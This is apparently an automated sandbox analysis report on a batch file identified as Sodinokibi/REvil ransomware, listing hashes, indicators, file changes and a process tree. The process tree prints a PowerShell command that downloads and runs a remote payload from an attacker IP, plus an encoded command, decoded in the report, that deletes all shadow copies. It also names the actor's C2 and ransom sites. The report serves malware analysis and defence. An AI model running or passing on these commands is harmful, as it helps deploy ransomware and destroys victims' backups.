Analysis
- max time kernel: 136s
- max time network: 53s
- platform: windows7_x64
- resource: win7v200430
- submitted: 30-04-2020 20:10
Static task: static1
Behavioral task: behavioral1
- Sample: zshXy28d.bat
- Resource: win7v200430
Behavioral task: behavioral2
- Sample: zshXy28d.bat
- Resource: win10v200430
General
- Target: zshXy28d.bat
- Size: 195B
- MD5: 57762b2ecee6c147a6514c848571ffb4
- SHA1: 7e6a6f28a582d92bc3fc1827e7dfa4d78c587706
- SHA256: a65c6e92ad4af6812ad2515353817627e6a22eeacec2e915c94eac829bba1a54
- SHA512: f5b1a7faee05e3bce6ebeb259f48ce37d867632c622a13032af281b575b8efc7bd9fb507624fc33ef6ecccbf34482935f1e7ffb484d8fa698bf1c459ae097788
Malware Config
Extracted: http://185.103.242.78/pastes/zshXy28d
Extracted: C:\458sv775hy-readme.txt
- Family: sodinokibi
- http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/90634376BBF9ECB9
- http://decryptor.cc/90634376BBF9ECB9
Signatures

Drops file in Program Files directory (34 IoCs)
Processes: powershell.exe
description | ioc | process
File opened for modification | \??\c:\program files\GetEnable.temp | powershell.exe
File opened for modification | \??\c:\program files\LimitUninstall.vbs | powershell.exe
File opened for modification | \??\c:\program files\UnblockLock.xlt | powershell.exe
File created | \??\c:\program files\microsoft sql server compact edition\v3.5\458sv775hy-readme.txt | powershell.exe
File opened for modification | \??\c:\program files\ConvertRequest.midi | powershell.exe
File opened for modification | \??\c:\program files\RevokePop.3gpp | powershell.exe
File opened for modification | \??\c:\program files\SaveConvertFrom.au3 | powershell.exe
File opened for modification | \??\c:\program files\SendMount.xls | powershell.exe
File opened for modification | \??\c:\program files\ShowConvertTo.zip | powershell.exe
File opened for modification | \??\c:\program files\UnprotectUnblock.vssx | powershell.exe
File opened for modification | \??\c:\program files\ApprovePublish.mpeg3 | powershell.exe
File opened for modification | \??\c:\program files\PublishTest.shtml | powershell.exe
File opened for modification | \??\c:\program files\AddUpdate.wav | powershell.exe
File opened for modification | \??\c:\program files\InitializeInvoke.wvx | powershell.exe
File created | \??\c:\program files\microsoft sql server compact edition\458sv775hy-readme.txt | powershell.exe
File opened for modification | \??\c:\program files\ResolveDisconnect.js | powershell.exe
File opened for modification | \??\c:\program files\ResumeProtect.doc | powershell.exe
File opened for modification | \??\c:\program files\DebugRename.xps | powershell.exe
File created | \??\c:\program files (x86)\458sv775hy-readme.txt | powershell.exe
File opened for modification | \??\c:\program files\ExportProtect.ppsm | powershell.exe
File opened for modification | \??\c:\program files\NewAdd.vsdx | powershell.exe
File opened for modification | \??\c:\program files\PingComplete.xlsb | powershell.exe
File opened for modification | \??\c:\program files\UpdateEnter.rle | powershell.exe
File created | \??\c:\program files\458sv775hy-readme.txt | powershell.exe
File opened for modification | \??\c:\program files\StepShow.ppt | powershell.exe
File opened for modification | \??\c:\program files\ConvertFromJoin.doc | powershell.exe
File created | \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\458sv775hy-readme.txt | powershell.exe
File opened for modification | \??\c:\program files\OptimizeStart.mid | powershell.exe
File opened for modification | \??\c:\program files\RenameSwitch.ram | powershell.exe
File opened for modification | \??\c:\program files\RestoreGroup.raw | powershell.exe
File opened for modification | \??\c:\program files\RevokeShow.clr | powershell.exe
File opened for modification | \??\c:\program files\StartPublish.dotm | powershell.exe
File opened for modification | \??\c:\program files\TracePublish.gif | powershell.exe
File opened for modification | \??\c:\program files\ConnectLimit.wma | powershell.exe
Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoC)
Processes: powershell.exe
pid | process
364 | powershell.exe
Suspicious behavior: EnumeratesProcesses (5 IoCs)
Processes: powershell.exe, powershell.exe
pid | process
364 | powershell.exe
364 | powershell.exe
364 | powershell.exe
1784 | powershell.exe
1784 | powershell.exe
Makes http(s) request (1 IoC)
Contacts server via http/https, possibly for C2 communication.
Processes:
description | flow | ioc
HTTP URL | 2 | http://185.103.242.78/pastes/zshXy28d
Sodin, Sodinokibi, REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.

Enumerates connected drives (3 TTPs)
Suspicious use of WriteProcessMemory (5 IoCs)
Processes: cmd.exe, powershell.exe
description | pid | process | target process
PID 1032 wrote to memory of 364 | 1032 | cmd.exe | powershell.exe
PID 364 wrote to memory of 1784 | 364 | powershell.exe | powershell.exe
PID 364 wrote to memory of 1784 | 364 | powershell.exe | powershell.exe
PID 364 wrote to memory of 1784 | 364 | powershell.exe | powershell.exe
PID 364 wrote to memory of 1784 | 364 | powershell.exe | powershell.exe
Suspicious use of AdjustPrivilegeToken (7 IoCs)
Processes: powershell.exe, powershell.exe, vssvc.exe
description | pid | process
Token: SeDebugPrivilege | 364 | powershell.exe
Token: SeDebugPrivilege | 364 | powershell.exe
Token: SeDebugPrivilege | 1784 | powershell.exe
Token: SeBackupPrivilege | 1612 | vssvc.exe
Token: SeRestorePrivilege | 1612 | vssvc.exe
Token: SeAuditPrivilege | 1612 | vssvc.exe
Token: SeTakeOwnershipPrivilege | 364 | powershell.exe
Blacklisted process makes network request (1 IoC)
Processes: powershell.exe
flow | pid | process
2 | 364 | powershell.exe
Modifies service (2 TTPs, 4 IoCs)
Processes: vssvc.exe
description | ioc | process
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer | vssvc.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer | vssvc.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer | vssvc.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer | vssvc.exe
Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
Processes: powershell.exe
description | ioc | process
Set value (str) | \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\c281z2253.bmp" | powershell.exe
Processes

1. C:\Windows\system32\cmd.exe (PID 1032)
   Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\zshXy28d.bat"
   - Suspicious use of WriteProcessMemory

   2. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 364)
      Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/zshXy28d');Invoke-COSENPIUZBZK;Start-Sleep -s 10000"
      - Drops file in Program Files directory
      - Suspicious behavior: CmdExeWriteProcessMemorySpam
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of WriteProcessMemory
      - Suspicious use of AdjustPrivilegeToken
      - Blacklisted process makes network request
      - Sets desktop wallpaper using registry

      3. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1784)
         Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
         (the -e argument is base64-encoded UTF-16LE and decodes to: Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}, i.e. deletion of all Volume Shadow Copies, which is why vssvc.exe appears below)
         - Suspicious behavior: EnumeratesProcesses
         - Suspicious use of AdjustPrivilegeToken

1. C:\Windows\system32\vssvc.exe (PID 1612)
   Command line: C:\Windows\system32\vssvc.exe
   - Suspicious use of AdjustPrivilegeToken
   - Modifies service